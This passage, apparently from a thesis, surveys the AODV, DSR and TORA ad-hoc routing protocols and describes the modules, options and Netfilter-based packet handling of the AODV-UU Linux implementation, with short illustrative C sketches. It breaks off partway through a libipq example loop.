(Ad hoc On-demand Distance Vector) [7] is a reactive ad-hoc routing protocol utilizing destination sequence numbers to ensure loop-freedom at all times and to avoid the count-to-infinity problem associated with classical distance-vector protocols. It offers low overhead, quick adaptation to dynamic link conditions and low processing and memory overhead. Message types AODV defines three different message types for routing protocol control packets: Route Request (RREQ) Route Reply (RREP) Route Error (RERR) Route discovery Since AODV is a reactive protocol, routes to destinations are acquired in an on-demand manner. When a node needs a route to a destination, it broadcasts a RREQ message. 
As this message is spread throughout the network, each node that receives it sets up a reverse route, i.e., a route towards the requesting node. As soon as the RREQ message reaches a node with a fresh enough route to the specified destination, or the destination itself, a RREP unicast message is sent back to the requesting node. Intermediate nodes use the reverse routes created earlier for forwarding RREP messages. If intermediate nodes reply to all transmissions of a given RREQ message, the destination node being searched for never learns about a route back to the requesting node, as it never receives the RREQ. This could cause the destination node to initiate a route discovery of its own, if it needs to communicate with the requesting node (e.g. to reply to a TCP connection request). To solve this, the originator of a RREQ message should set a gratuitous RREP flag in the RREQ if it believes that this situation is likely to occur. An intermediate node receiving a RREQ with this flag set and replying with a RREP must also unicast a gratuitous RREP to the destination node. This allows the destination node to learn a route back to the requesting node. Routing table information Each routing table entry maintained by AODV contains the following fields: Destination IP Address Destination Sequence Number Valid Destination Sequence Number Interface Hop Count (number of hops needed to reach the destination) 12 22 Next Hop List of Precursors (described below) Lifetime (expiration or deletion time of the route) Routing Flags State (valid or invalid) Route maintenance Nodes monitor the link status of the next hop in active routes, i.e., routes whose entries are marked as valid in the routing table. This can be done by observing periodic broadcasts of HELLO messages (beacons) from other nodes, or any suitable link layer notifications, such as those provided by IEEE [34]. When a link failure is detected, a list of unreachable destinations is put into a RERR message and sent out to neighboring nodes, called precursors, that are likely to use the current node as their next hop towards those destinations. For this purpose, nodes maintain a precursor list for each routing table entry. Finally, routes are only kept as long as they are needed. If a route is not used for a certain period of time, its corresponding entry in the routing table is invalidated and subsequently deleted. Summary AODV is currently one of the most popular ad-hoc routing protocols and has enjoyed numerous reviews (e.g. in [2], [3] and [35]). These indicate that AODV performs very well both during high mobility and high network traffic load, making it one of the most interesting candidates among today s ad-hoc routing protocols. Several independent AODV implementations exist, such as AODV-UU [6] and Mad-hoc AODV [38] DSR Description DSR (Dynamic Source Routing) [23] is a reactive ad-hoc routing protocol based on source routing. Source routing means that each packet contains in its header an ordered list of addresses through which the packet should pass on its way to the destination this source route is created by the node that originates the packet. The usage of source routing trivially allows routing of packets to be loop-free, avoids the need for keeping up-to-date routing information in intermediate nodes and allows nodes that overhear packets containing source routes to cache this information for their own future use. 
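To make the source-routing idea concrete, the following C sketch shows roughly what an accumulated route record could look like while a Route Request propagates. The types, the hop limit and the append function are invented for illustration only and do not correspond to the actual DSR header layout.

    #include <stdint.h>

    #define DSR_MAX_HOPS 16   /* arbitrary limit chosen for this sketch */

    /* Hypothetical route record accumulated in a Route Request. */
    struct dsr_route_record {
        uint32_t addrs[DSR_MAX_HOPS];  /* addresses the request has passed */
        int      num_addrs;            /* how many of them are filled in   */
    };

    /* A forwarding node appends its own address before re-broadcasting
     * the Route Request.  Returns -1 if the record is already full.    */
    static int dsr_record_append(struct dsr_route_record *rec, uint32_t own_addr)
    {
        if (rec->num_addrs >= DSR_MAX_HOPS)
            return -1;
        rec->addrs[rec->num_addrs++] = own_addr;
        return 0;
    }

When the request reaches its target, the accumulated record is what is copied into the Route Reply and later placed in the header of data packets as the source route.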
Route discovery A node that wishes to send a packet to a destination checks in its route cache if it has a route available. If no route is found in the route cache, route discovery is initiated. The node initiating the route discovery broadcasts a Route Request packet, containing its own address, the destination (target) address and a unique request identification. Each Route Request also contains an initially empty list of nodes through which this particular Route Request packet has passed. If a node receives such a Route Request and discovers that it is the target of the request, it responds with a Route Reply back to the initiator of the Route Request. The Route Reply contains an copy of the accumulated route record from the Route Request. If a node receiving a Route Request instead discovers that it is not the target of the request, it appends its own address to the route record list of the Route Request, and re-broadcasts the Route Request (with the same request identification). Route Replies are sent back to the Route Request initiator using a route found in the route cache of the replying node. If no such route exists, the replying node should itself initiate a route discovery to find a route back to the originator of the original Route Request (and piggyback its Route Reply, to avoid possible infinite 13 23 recursion of route discoveries). However, if the replying node uses a MAC protocol that requires bi-directional links, such as IEEE [34], the node replying to the initiator s Route Request should instead reverse the route found in the Route Request, and use that route for its Route Reply. This ensures that the discovered route is bi-directional, and eliminates the need for an additional route discovery. Finally, when the initiator of a Route Request receives the Route Reply, it caches the route in its route cache and uses it for sending subsequent packets to that destination. Route maintenance If a route in the route cache is found to be broken by link-layer notifications, lack of passive acknowledgements, lack of network-layer acknowledgements or reception of packets containing Route Error information the node should remove the broken route from its route cache and send a Route Error to each node that has sent a packet routed over that link since an acknowledgement was last received. In addition, the node should notify the original senders of any affected pending packets by sending a Route Error to them, and try to salvage the pending packets. Salvaging can be done by examining the node s route cache for additional routes to the same destination and replacing the source route with a valid one. If no such alternative routes exist, the pending packets are discarded. Summary The many caching features found in DSR and its techniques for detecting and utilizing uni-directional links (if the underlying link layer can cope with those) makes it attractive for many ad-hoc networking configurations. However, the source routing approach comes at the cost of increased overhead, since each packet must carry the complete path to its destination in its packet header. Simulation studies such as [2] and [3] indicate that DSR works very well when network traffic loads are moderate, and that high mobility does not pose any particular problems. The number of control packets sent by DSR is generally much lower than for e.g. 
AODV with HELLO messages, but the byte overhead is larger because of the source routes contained in packets TORA Description TORA (Temporally-Ordered Routing Algorithm) [31] is a reactive ad-hoc routing protocol based on link reversal algorithms. It offers distributed operation, i.e., routers only need to maintain information about adjacent routers, and prevents long-lived loops. It minimizes communication overhead by localizing the algorithmic reaction to network topology changes, and also offers proactive operation as an option. For each destination, TORA builds and maintains a directed acyclic graph (DAG) which is used for routing packets to that destination. By associating heights with each node in the network and adjusting these as necessary, packets always flow downstream on their way to the destination. If a link breaks, the heights of nodes can be adjusted by link reversal algorithms to allow the direction of the link to be reversed. Requirements For its operation, TORA requires IMEP (Internet MANET Encapsulation Protocol) [32], a protocol designed specifically to support the operation of mobile ad-hoc network routing protocols. The IMEP features of specific interest to TORA are reliable, ordered broadcasts for its distributed operation, link and network layer address resolution and mapping, security authentication and (preferrably) link status sensing to avoid beaconing for node presence indication. Route creation In reactive mode, routes are created as needed. The two packet types used for this are Query (QRY) packets and Update (UPD) packets. A node initiates the route creation process by sending a QRY packet to its neighbors, 14 24 containing the identifier of the destination for which a route is requested. The QRY packet is propagated by neighboring routers until it is received by a router that has a trusted route to the destination, which will reply with a UPD packet indicating its height. On its way back to the node that initiated the route discovery, the UPD packet will cause routers to adjust their heights to be larger than the height specified in the UPD packet. Each router forwarding such a UPD packet will include their new height in the UPD packet, allowing the requested route to be created as a downstream route from the requesting node to the destination. In proactive mode, the node initiating the route discovery instead sends an OPT (Optimization) packet that is processed and forwarded by neighboring routers. The OPT packet allows routers to change their mode of operation to proactive operation, but otherwise has the same purpose as a QRY packet. Route maintenance Maintenance of routes is performed by reacting to topological changes in the network, such that routes to the destination are re-established within a finite amount of time. When a node detects a link failure, it adjusts its height to a local maximum with respect to the failed link. It then broadcasts a UPD packet to its neighbors. However, a route failure is not propagated until a node loses its last downstream link. If network partitioning is detected by a node, all links in that partition are marked as undirected to erase invalid routes. This is performed by sending Clear (CLR) packets to all neighbors. After such a partitioning, nodes will have to re-initiate the route discovery process when they require a route to a destination. Summary TORA uses a rather unique link reversal approach for solving the problem of routing in ad-hoc networks. 
However, its underlying requirements, i.e., the usage of IMEP, has proven to be a considerable source of overhead. Simulations in [2] indicate that this amount of overhead may grow so large that TORA effectively suffers a congestive collapse when the number of nodes reaches 30; contention of the wireless medium results in collisions which in turn make the situation even worse, fooling the IMEP protocol to erroneously believe that links are breaking. Therefore, TORA is probably best suited for small or moderately large ad-hoc networks. 3.7 Conclusions From the examples of ad-hoc routing protocols presented in this chapter, it should be evident that the selection of an ad-hoc routing protocol for use in an ad-hoc network requires careful thought. Parameters such as network size, mobility and traffic load all have an impact on the suitability of each protocol. This, together with the spontaneous nature of ad-hoc networks, easily turns the selection of a routing protocol into a complicated task. Possibly, the ongoing work of the IETF MANET working group [1] to promote a few of the existing ad-hoc routing protocol specifications to experimental RFCs could be of help, but it is too early to tell. 15 25 Chapter 4 AODV-UU This chapter provides a technical overview of AODV-UU. The main focus is put on its software modules and packet handling, as this is crucial for its operation and for the porting of AODV-UU to the ns-2 network simulator described in Chapter Introduction AODV-UU [6] is a Linux implementation of the AODV (Ad hoc On-demand Distance Vector) [7] routing protocol, developed at Uppsala University, Sweden. It runs as a user-space daemon, maintaining the kernel routing table. AODV-UU was written in the C programming language and has been released under the GNU General Public License (GPL). AODV-UU implements all mandatory and most optional features of AODV. One of the main goals of AODV-UU was to supply an AODV implementation that complied with the latest draft not older versions and this goal is upheld by continuous software development. New users of AODV-UU will appreciate its easy installation, stability and ease of use. The system requirements of AODV-UU are rather modest. A recent Linux distribution with a version 2.4.x kernel along with a wireless network card suffices (it is also possible to use a wired networking setup). In addition, AODV-UU can be cross-compiled for the ARM platform so that it can be used on many popular PDAs, e.g. the COMPAQ ipaq and the Sharp Zaurus. The version of AODV-UU described in this chapter is version 0.5, which complies with version 10 of the AODV draft. The complete source code is available from the AODV-UU homepage [6]. 4.2 Installation and usage Installation of AODV-UU is very straightforward. Compilation is handled by the UNIX make utility and a corresponding Makefile for AODV-UU, resulting in a user-space routing daemon (aodvd) and a kernel module (kaodv.o). The Makefile also offers a target to install the kernel module on the system. When installed, the kernel module is automatically loaded by the modprobe module loading system as soon as it is needed. To run AODV-UU, one executes the routing daemon (and optionally detaches it from the console). From there, the operation of AODV-UU should be more or less transparent. During execution, the AODV-UU routing daemon will log relevant events to a logfile if logging has been enabled. 
Also, if routing table logging has been enabled, the routing table will be periodically dumped to a routing table logfile. These two logfiles are useful for analyzing the behavior of AODV-UU, e.g. for post-run analysis of ad-hoc networking experiments, but can also help gaining understanding of AODV operation in general. 16 26 4.3 Configuration AODV-UU offers many options for adjusting its operation. These are supplied as parameters on the command line to the aodvd routing daemon. The following options are available: Daemon mode (-d, --daemon): Allows detaching of the routing agent from the console, i.e., transparent execution in the background. Force gratuitous (-g, --force-gratuitous): Forces the gratuitous flag to be set on all RREQs. Gratuitous RREQs are described in Section Help (-h, --help): Displays help information. Interface (-i, --interface): Specifies which network interfaces that AODV-UU should be attached to. The default is the first wireless network interface. HELLO jittering (-j, --hello-jitter): Disables jittering of HELLO messages. Logging (-l, --log): Enables logging to an AODV-UU logfile. Routing table logging (-r N, --log-rt-table N): Logs the contents of the routing table to a routing table logfile every N seconds. N HELLOs (-n N, --n-hellos N): Requires N HELLO messages to be received from a node before it is treated as a neighbor. Uni-directional hack (-u, --unidir-hack): Enables detection and avoidance of uni-directional links. This is an experimental feature. Gateway mode (-w, --gateway-mode): Enables Internet gateway support. This is an experimental feature. Disabling of expanding ring search (-x, --no-expanding-ring): Disables the expanding ring search for RREQs, which is normally used for limiting the dissemination of RREQs in the network. No wait-on-reboot (-D, --no-worb): Disables the 15-second wait-on-reboot delay at startup. Version information (-V, --version): Displays version and copyright information. Those features of AODV-UU that are marked as experimental are not guaranteed to work, and may disappear in any future release. Therefore, they should be used with caution. 4.4 Interaction with IP Since AODV is a reactive protocol, route acquisition is done on demand. This requires the routing protocol implementation to be able to intercept requests for destinations to which a valid route does not exist. Furthermore, the timeout-based removal of stale routing table entries requires support for monitoring of packets at each host. Early AODV implementations such as Mad-hoc AODV [38] and the implementation described by Larsson and Hedman in [35] were unable to intercept and temporarily delay packets for which a route did not exist, causing initial connection attempts to a previously unknown node to fail. The temporary work-around was to require the user to manually generate some arbitrary initial traffic to that node for route establishment to take place. This hindered transparent operation of connection-oriented protocols such as TCP, where initial packets are vital for connection setup. Since then, packet handling support in Linux has been vastly improved. Most notably, a software framework called Netfilter has been developed, allowing very flexible packet handling to be performed. AODV-UU uses Netfilter for all its packet processing and modification needs. 17 27 4.4.1 The Netfilter framework Netfilter [36] is a Linux kernel framework for mangling packets. For each network protocol, certain hooks are defined. 
These hooks correspond to well-defined places in the protocol stack and allow custom packet mangling code to be inserted in the form of kernel modules. Figure 4.1 illustrates this for the IP protocol, with the hooks NF_IP_PRE_ROUTING, NF_IP_LOCAL_IN, NF_IP_FORWARD, NF_IP_LOCAL_OUT and NF_IP_POST_ROUTING placed between the data link layer, the kernel routing and forwarding functions, and the transport layer.

Figure 4.1: Netfilter hooks for IP. Packets delivered on these hooks can be captured and modified by custom code segments (kernel modules).

Each packet arriving at such a hook is delivered to the code segments that have registered themselves on that hook. This allows packets to be altered, dropped or re-routed by these custom code segments. When a packet has been processed (and possibly modified), a verdict should be returned to Netfilter. This verdict instructs Netfilter to perform some packet-related action, e.g. to drop the packet or to let it continue its traversal through the protocol stack.

Netfilter also offers the ability to process packets in user space. By returning a special queue verdict, packets are queued in kernel space and information about each packet is sent to user space over a netlink socket. Queued packets remain queued until the user-space application, at the other end of the socket, returns verdicts indicating the desired actions for these packets.

In AODV-UU, a kernel module component constantly listens to both inbound and outbound packets by registering itself on the appropriate Netfilter hooks. Packets are queued as needed to allow user-space packet processing to be performed by the AODV-UU routing daemon. This allows the on-demand route acquisition and operation of AODV to be realized. Finally, the Netfilter approach allows the implementation to stay independent of kernel modifications, which is a big advantage in terms of software maintenance.

Performance

The user-space packet processing comes at a certain performance penalty, but this has not been a major concern during the development of AODV-UU. Instead, the developers have aimed for stability and completeness of features. Current experience estimates the additional delay caused by user-space processing to be roughly one millisecond for a one-hop round-trip packet.

4.5 Software modules

AODV-UU consists of a variety of software modules, i.e., C source code files (.c) with corresponding header files (.h). Also, some header files constitute placeholders for definitions (constants and macros) only. In the following subsections, the software modules are divided into kernel-related and non-kernel-related modules, and each module is described individually. The intention is to summarize the functionality contained in the source code, as an initial step towards the porting of AODV-UU to the ns-2 network simulator described in Chapter 6.

Non-kernel-related modules

aodv_hello.{c, h}

This module contains HELLO message functionality. It offers generation and sending of HELLO messages, scheduling of HELLO message generation, processing of HELLO messages, and forced processing of a message as if it were a HELLO message (to extract neighbor information). It should be noted that HELLO messages in fact are RREP messages with their fields set to special values. Neighbor set extraction is performed by reading special AODV message extensions, i.e., additional information contained within an AODV message.

aodv_rerr.{c, h}

This module contains RERR message functionality.
It defines a datatype for RERR messages and unreachable destinations, and offers RERR message creation, addition of unreachable destinations to RERR messages and processing of RERR messages. aodv_rrep.{c, h} The aodv_rrep module contains RREP message functionality. It defines the datatypes for RREP and RREP- ACK messages. The latter are used for acknowledgment of RREP messages, if the link over which the RREP was sent may be unreliable or uni-directional. The module offers creation and processing of messages of these two message types. aodv_rreq.{c, h} This module contains RREQ message functionality. It defines the datatype for RREQ messages, offers creation and processing of RREQ messages, and allows route discoveries to be performed. It also offers buffering of received RREQs and blacklisting of RREQs from certain nodes. The blacklisting is used for ignoring RREQs from nodes that have previously failed to receive or acknowledge RREPs correctly, e.g. due to a uni-directional link. aodv_socket.{c, h} This module contains the socket functionality of AODV-UU, responsible for handling AODV control messages. It maintains two separate message buffers; a receive buffer and a send buffer, used for storing an incoming or outgoing message until it has been processed or sent out. Each buffer holds only one (1) message at a time. This is not a problem, since packets are handled one by one, and hence safely can be discarded from the buffers after message processing or sending has completed. The module offers creation of an AODV message (initialization of the send buffer), queueing of an AODV message (copying of message contents to the send buffer) and processing of a received packet. The packet 19 29 processing function checks the type field of the packet, converts it to the appropriate message type and calls the correct handler function, e.g. rrep_process() of the aodv_rrep module if the message is a RREP message. aodv_timeout.{c, h} This module contains handler functions for timeouts, i.e., functions that are called when certain pre-determined events occur. The handler functions receive a pointer to the affected object, e.g. a routing table entry, as a parameter. Handler functions are defined for the following events: Route deletion timeout: This timeout occurs when a route has not been used for a certain period of time. This deletes the route from the internal routing table of AODV-UU. Route discovery timeout: This timeout occurs when route discovery was requested, but a route was not found within a certain amount of time. If the expanding ring search option is enabled, this results in a new route discovery with a larger TTL value than in the previous attempt. Otherwise the packet is dropped, an ICMP Destination Host Unreachable message is sent to the application and the destination is removed from the list of destinations for which AODV-UU is seeking routes. Route expiry timeout: This timeout occurs when the lifetime of a route has expired. This marks the route as down, creates a RERR message regarding unreachable destinations and sends the RERR message to affected nodes. HELLO timeout: This timeout occurs when HELLO messages from a node stop being received. This timeout occurs on an individual basis for each affected route, and is treated as a link failure, i.e., the route expiry timeout handler function is called. 
RREQ record timeout: This timeout occurs when a RREQ message has become old enough that subsequent RREQs from the affected node with a certain RREQ ID should not be considered as duplicates (i.e., being discarded if received) anymore. RREQ blacklist timeout: This timeout occurs when RREQs from a certain node should not be ignored anymore. Nodes end up in the blacklist by repeatedly sending RREQs for a certain destination, even though RREPs have been sent back to the requesting node. (The cause for this could e.g. be unidirectional links.) The RREQ blacklist timeout handler function removes a node from this blacklist so that normal operation is resumed. RREP-ACK timeout: If RREPs are sent over an unreliable or uni-directional link, a RREP-ACK can be requested by the sending node. If no RREP-ACK is received within a certain time period, this timeout occurs. The result is that the node that failed to reply with a RREP-ACK is added to the RREQ blacklist, described earlier. Wait-on-reboot timeout: This timeout occurs when the 15-second wait-on-reboot phase at startup has elapsed. It resumes active operation of the node, i.e., re-enables transmission of RREP messages. debug.{c, h} This module contains the logging functionality of AODV-UU. It offers logging of general events to a logfile as well as routing table logging to a routing table logfile. It also contains functions for converting IP addresses and AODV message flags to strings, for the purpose of printing and logging. Logging of all general events is performed by a special logging function which examines the severity of the log message, checks the current log settings, and writes log messages to the appropriate logfiles. By default, log messages are also written to the console. Routing table logging is performed by periodically dumping the contents of the routing table to a routing table logfile. Finally, debug-purpose logging is done through a special DEBUG macro in the source code. Such logging will only be effective if AODV-UU has been compiled with the DEBUG option set. 20 30 defs.h This header file contains macros and datatypes used throughout AODV-UU, and hence, almost all the other modules include it. A brief listing of the contents can be found below. AODV-UU version number: Used by the main program (main.c) for displaying the program version number. Logfile and routing logfile paths: By default, these are set to /var/log/aodvd.log and /var/log/aodvd_ rt.log. A definition of infinity, and infinity checking: Used for marking a route as down, by setting its corresponding hop count to this value. An infinity checking macro allows for easy testing of values against this infinity value. Maximum number of interfaces: The maximum number of network interfaces supported by AODV-UU. A datatype for host information: The host_info datatype contains information about a host, i.e., its latest used sequence number, latest time of broadcast, RREQ ID, Internet gateway mode setting, number of network interfaces attached to the host and an array of corresponding network devices. A datatype for network devices: The dev_info datatype contains information about a network device, i.e., its status, socket, index number (for addressing into the array of network devices), name, IP address, netmask and broadcast address. Macros for retrieving network device information: The macros DEV_IFINDEX(ifindex) and DEV_ NR(n) are useful when network device information is needed. 
DEV_IFINDEX(ifindex) allows for retrieval of the network device information based on an interface index, as defined by the operating system. It translates this interface index into a network device number, and retrieves the network device information from the host information of the current host. DEV_NR(n) instead directly retrieves network device information from the host information of the current host; it indexes into the network device array and retrieves the network device information from there. AODV message types: The different message types used by AODV-UU (AODV_HELLO, AODV_RREQ, AODV_RREP, AODV_RERR and AODV_RREP_ACK) are associated with unique message type numbers. The AODV message type: This is the message type for AODV messages in AODV-UU. It contains a type field followed by space for type-specific data, i.e., enough space to hold any type of AODV message. All AODV messages in AODV-UU, such as RREQs, RREPs and RERRs, will be type casted to this general message type before they are sent out. Similarly, since the type field indicates the type of the message, received AODV messages can be type casted back to their corresponding specialized type and processed correctly. Macros to access AODV extensions: Macros used for accessing AODV message extensions, i.e., extra information included with AODV messages, such as neighbor set information. A type definition for callback functions: This type definition specifies that callback functions used for socket communication are arbitrary functions taking an integer as an argument (used for passing file descriptors to message handling functions). icmp.{c, h} This module contains functionality for sending an ICMP Destination Host Unreachable message to the application if route lookup fails for some destination. 21 31 main.c This is the main program of AODV-UU. It handles initialization of the other modules, kernel module loading and host initialization, and uses select() to wait for incoming messages on sockets. packet_input.{c, h} This module handles communication with the AODV-UU kernel module, kaodv. All packets arriving from the kernel module, both incoming and outgoing packets, will be processed by the packet_input() function. However, AODV control messages will be ignored, since these are handled separately by socket communication in the aodv_socket module. Route discovery and packet buffering is performed as needed. If a packet is destined for another node, and an active route to that node is available, the packet is forwarded using the next hop information from the routing table. packet_queue.{c, h} This module handles queueing (buffering) of packets. Each packet from Netfilter is associated with a unique packet ID, and these IDs are queued in a FIFO queue. Hence, the module performs a light-weight queueing of packets. As soon as AODV-UU has decided on an action for a packet, that packet can be removed from the queue. The packet ID together with a verdict is then returned through the libipq module to Netfilter, which carries out the requested action. The functionality of the packet_queue module allows individual packets to be added, sent or dropped, or all packets in the queue to be destroyed (dropped). params.h This header file contains the following constants, defined by the AODV draft [7]: ACTIVE_ROUTE_TIMEOUT: The lifetime of an active route. TTL_START: Initial TTL value to be used for RREQs. DELETE_PERIOD: Time to wait after expiry of a routing table entry before it is expunged, i.e., deleted. 
ALLOWED_HELLO_LOSS: Maximum loss of anticipated HELLO messages before the link to that node is considered to be broken. BLACKLIST_TIMEOUT: Timeout for nodes that are part of this node s RREQ blacklist. HELLO_INTERVAL: Interval between broadcasts of HELLO messages. LOCAL_ADD_TTL: Used in the calculation of TTL values for RREQs during local repair. MAX_REPAIR_TTL: Maximum number of hops to a destination for which local repair is to be performed. MY_ROUTE_TIMEOUT: Time period for which a route, advertised in a RREP message, is valid. NET_DIAMETER: The maximum diameter of the network. This value will be used as an upper bound for RREQ TTL values. NEXT_HOP_WAIT: Time to wait for transmission by a next-hop node when attempting to utilize passive acknowledgements (i.e., overhearing of network traffic). NODE_TRAVERSAL_TIME: Conservative, estimated average of the one-hop traversal time for packets. NET_TRAVERSAL_TIME: Estimated time that it takes for a packet to traverse the network. 22 32 PATH_TRAVERSAL_TIME: Time used for buffering RREQs and waiting for RREPs. RREQ_RETRIES: Maximum number of RREQ transmission retries to find a route. TTL_INCREMENT: Incrementation of the TTL value in each pass of expanding ring search. TTL_THRESHOLD: When the TTL value for RREQs in expanding ring search has passed this value, it should be set to NET_DIAMETER (instead of continuing the stepwise incrementation). K: This constant should be set according to characteristics of the underlying link layer. A node is assumed to invariably receive at least one out of K subsequent HELLO messages from a neighbor if the link is working and the neighbor is sending no other traffic. routing_table.{c, h} This module contains routing table functionality. It defines the datatypes for routing table entries and precursors, both containing pointers to another element of the same type. That way, entries can form a linked list. Each routing table entry contains the following information: Destination IP Address Destination Sequence Number Interface (network interface index) Hop Count Last Hop Count Next Hop A list of precursors Lifetime Routing Flags (forward route, reverse route, neighbor, uni-directional and local repair) A timer associated with the entry RREP-ACK timer for the destination HELLO timer Last HELLO time HELLO count A hash value (for quickly locating the entry) A pointer to subsequent routing table entries The operations offered by this module are the initialization and cleanup of the routing table, route addition, route modification, route timeout modification, route lookup, active route lookup, route invalidation, route deletion, precursor addition and precursor removal. As routes are added, updated, invalidated or deleted, the kernel routing table of the system is updated accordingly. This is done through calls to kernel routing table functions of the k_route module. 23 33 seek_list.{c, h} This module contains management of the seeking list, i.e., the list of destinations for which AODV-UU is seeking routes. The seeking list is a linked list of entries, each containing the following information: The Destination IP address The Destination Sequence Number Flags (used for resending RREQs) Number of RREQs issued The TTL value to use for RREQs IP data (for generating an ICMP Destination Host Unreachable message to the application if route discovery fails) A seeking timer A pointer to subsequent seeking list entries Entries may be added to or removed from the seeking list as needed. 
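Returning briefly to the routing_table module, the fields listed above can be pictured roughly as the following C structure. This is a condensed, hypothetical sketch for illustration, not the actual declaration in AODV-UU's routing_table.h; in particular, the timer-related fields (entry timer, RREP-ACK timer, HELLO timer and counters) are omitted for brevity.

    #include <stdint.h>
    #include <sys/time.h>

    /* A node that routes through us towards the destination. */
    struct precursor {
        uint32_t          neighbor_addr;
        struct precursor *next;
    };

    /* Simplified sketch of an AODV-UU-style routing table entry. */
    struct rt_entry {
        uint32_t          dest_addr;   /* destination IP address             */
        uint32_t          dest_seqno;  /* destination sequence number        */
        unsigned int      ifindex;     /* network interface index            */
        uint8_t           hcnt;        /* hop count to the destination       */
        uint8_t           last_hcnt;   /* hop count before the route broke   */
        uint32_t          next_hop;    /* next hop towards the destination   */
        struct precursor *precursors;  /* list of precursors                 */
        struct timeval    lifetime;    /* expiration or deletion time        */
        uint16_t          flags;       /* forward/reverse/neighbor/... flags */
        int               state;       /* valid or invalid                   */
        unsigned int      hash;        /* for quickly locating the entry     */
        struct rt_entry  *next;        /* next entry in the linked list      */
    };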
Seeking list entries can also be searched for by specifying their destination IP addresses.

timer_queue.{c, h}

This module contains the timer functionality of AODV-UU. It defines a datatype for timers, containing an expiry time, a pointer to a handler function, a pointer to data (used by the handler function), a boolean value indicating timer usage, and a pointer to other timers. Timers are added to a timer queue, represented by a linked list. This list is sorted, with the timer that will expire first at the head of the list. The timer queue can be aged, i.e., checked for expired timers. During aging, the handler functions of expired timers are called in sequence, with the specified data pointer (e.g. a pointer to a routing table entry) being passed as an argument. This allows the handler functions to be context-aware. Aging of the timer queue also updates the select() timeout used by AODV-UU while waiting for incoming messages on sockets. The new timeout of this select() timer is taken from the timer at the head of the timer queue.

Kernel-related modules

kaodv.c

This module is the kernel module of AODV-UU. It registers a packet handling function on three Netfilter hooks: NF_IP_PRE_ROUTING (for handling incoming packets prior to routing), NF_IP_LOCAL_OUT (for handling locally generated packets) and NF_IP_POST_ROUTING (for re-routing packets prior to sending them). Packets arriving on the NF_IP_PRE_ROUTING or NF_IP_LOCAL_OUT hook are queued to user space, to allow AODV-UU to process them. Packets arriving on the NF_IP_POST_ROUTING hook, i.e., packets that should be sent out by the system, are re-routed to ensure usage of the latest routing information available from the kernel routing table. (Recall that the kernel routing table may have changed as an effect of AODV-UU operation, e.g. route discoveries.)

k_route.{c, h}

This module contains functionality for modifying the kernel routing table of the system. Routes may be added, changed or deleted. The kernel routing table modifications are carried out by ioctl() calls.

libipq.{c, h}

This module, developed by the Netfilter core team, contains the functionality for user-space queueing of IP packets. It uses a netlink socket to communicate with Netfilter, and allows user-space packet handling callback functions to be called whenever a queued packet arrives. AODV-UU uses the libipq module for receiving packets and returning verdicts for packets from user space.

4.6 Packet handling

In this section, the packet handling of AODV-UU is described. Roughly, it distinguishes between data packets and AODV control messages, and handles them separately using different software modules. This is shown in Figure 4.2: data packets pass from the Netfilter hooks through the kaodv kernel module and the netlink socket to the libipq, packet_queue and packet_input modules in user space, while AODV control messages reach the aodv_socket module on UDP port 654 and are dispatched to the message-handling modules (aodv_hello, aodv_rerr, aodv_rrep and aodv_rreq).

Figure 4.2: Packet handling of AODV-UU. Data packets and AODV control messages are handled separately.

Packet arrival

When a packet traverses the protocol stack, it is caught by the Netfilter hooks that have been set up by the AODV-UU kernel module, kaodv. The nf_aodv_hook() function of the kaodv module identifies the packet type, and either tells Netfilter to accept the packet (i.e., to let it through and allow the system to process it on its own) or to queue it (for further processing by AODV-UU in user space). Non-IP packets are always accepted, since these packets are of no interest to AODV-UU.
Locally generated packets are always queued, since a route may have to be determined for those. Incoming AODV control messages are always accepted, since these eventually should be processed on a separate UDP socket and must be let through in order to be able to arrive there. Also, only packets on AODV-UU-enabled network interfaces should be processed by AODV-UU. Packets on other network interfaces are therefore immediately accepted, and not processed further. 25 35 4.6.2 Initial packet processing Packet processing is performed by the packet_input() function of the packet_input module. If the packet is an AODV control message, an accept verdict is returned to the libipq module so that the packet eventually will end up on the AODV control message UDP socket, to be received or sent out, depending on whether the packet is an incoming or outgoing packet. Otherwise, the packet is analyzed further Data packet processing If the destination of the packet (determined by its destination IP address) is the current host, the packet is a broadcast packet, or Internet gateway mode has been enabled and the packet is not a broadcast within the current subnet, the packet is accepted. This means that the packet under these circumstances will be handled as usual by the operating system. Otherwise, the packet should either be forwarded, queued or dropped. The internal routing table of AODV-UU is used for checking whether an active route to the specified destination exists or not. If such a route exists, the next hop of the packet is set and the packet is forwarded. Otherwise, provided that the packet was generated locally, the unique packet ID provided by the libipq module is used by the packet_queue module for indirectly queueing the packet until AODV-UU has decided on an action, and a route discovery is initiated. If the packet was not generated locally, and no route was found, it is instead dropped and a RERR message is sent to the source of the packet AODV control message processing AODV control messages are received on a UDP socket (on port 654) and processed by the aodv_socket module. The type field of the AODV message is checked, the message is converted to the corresponding specialized message type, and the correct handler function is called in the appropriate module AODV control message sending Each AODV control message generated by AODV-UU is sent out on the AODV control message UDP socket. Such a message will be caught by the Netfilter hook for locally generated packets, NF_IP_LOCAL_OUT, queued by the kaodv module and received by the packet_input module of AODV-UU through libipq. The packet_input module will return an accept verdict to libipq, and the packet will then be caught by the postrouting Netfilter hook, NF_IP_POST_ROUTING. The packet is re-routed to ensure usage of the most recent routing information, and sent out by the system. 4.7 Current status AODV-UU has successfully been tested together with other AODV implementations during an AODV interop [39] in March 2002, with good results. These results can be attributed to the large amount of dedicated work that has been put into the development of AODV-UU. Currently (September 2002), AODV-UU is undergoing some minor changes to adapt it to the very latest AODV draft (version 11) [7]. A new version of AODV-UU (version 0.6) is expected to appear soon, and hopefully, a technical report on AODV-UU will also be prepared in the near future. 
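As a complement to the description of AODV-UU's packet handling above, the sketch below shows the basic libipq receive-and-verdict loop on which such user-space processing builds. It is a minimal, stand-alone example rather than AODV-UU's actual code; the buffer size and the accept-everything policy are choices made only for this sketch (a real daemon would inspect each packet and, like packet_input, decide whether to accept, queue or drop it).

    /* Minimal libipq loop: read packets queued by the kernel and return
     * a verdict for each one.  Link with -lipq.                        */
    #include <stdlib.h>
    #include <sys/socket.h>
    #include <linux/netfilter.h>
    #include <libipq.h>

    #define BUFSIZE 2048

    int main(void)
    {
        unsigned char buf[BUFSIZE];
        struct ipq_handle *h;

        h = ipq_create_handle(0, PF_INET);
        if (!h) {
            ipq_perror("ipq_create_handle");
            exit(1);
        }
        /* Ask the kernel to copy entire packets to user space. */
        if (ipq_set_mode(h, IPQ_COPY_PACKET, BUFSIZE) < 0) {
            ipq_perror("ipq_set_mode");
            exit(1);
        }
        for (;;) {
            if (ipq_read(h, buf, BUFSIZE, 0) < 0) {
                ipq_perror("ipq_read");
                break;
            }
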